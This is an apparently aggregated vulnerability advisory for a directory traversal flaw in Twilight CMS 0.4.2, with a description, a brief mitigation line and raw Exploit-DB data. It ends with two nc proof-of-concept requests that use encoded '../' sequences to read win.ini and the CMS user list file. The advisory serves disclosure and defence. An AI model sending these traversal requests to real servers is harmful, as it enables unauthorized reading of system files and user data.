Twilight CMS Directory Traversal Vulnerability

vendor:

Twilight CMS

by:

SecurityFocus

7,5

CVSS

HIGH

Directory Traversal

CWE

Product Name: Twilight CMS

Affected Version From: 0.4.2

Affected Version To: 0.4.2

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2013

Twilight CMS Directory Traversal Vulnerability

Twilight CMS is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input. Remote attackers can use specially crafted requests with directory-traversal sequences ('../') to retrieve arbitrary files in the context of the application. Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks.

Mitigation:

Input validation should be used to prevent directory traversal attacks.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/61906/info

Twilight CMS is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input.

Remote attackers can use specially crafted requests with directory-traversal sequences ('../') to retrieve arbitrary files in the context of the application.

Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks.

Twilight CMS 0.4.2 is vulnerable; other versions may also be affected. 

nc [www.example.com] 80 GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini HTTP/1.1

nc [www.example.com] 80 GET demosite/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/TwilightCMS/Sites/company_site/Data/user list.dat HTTP/1.1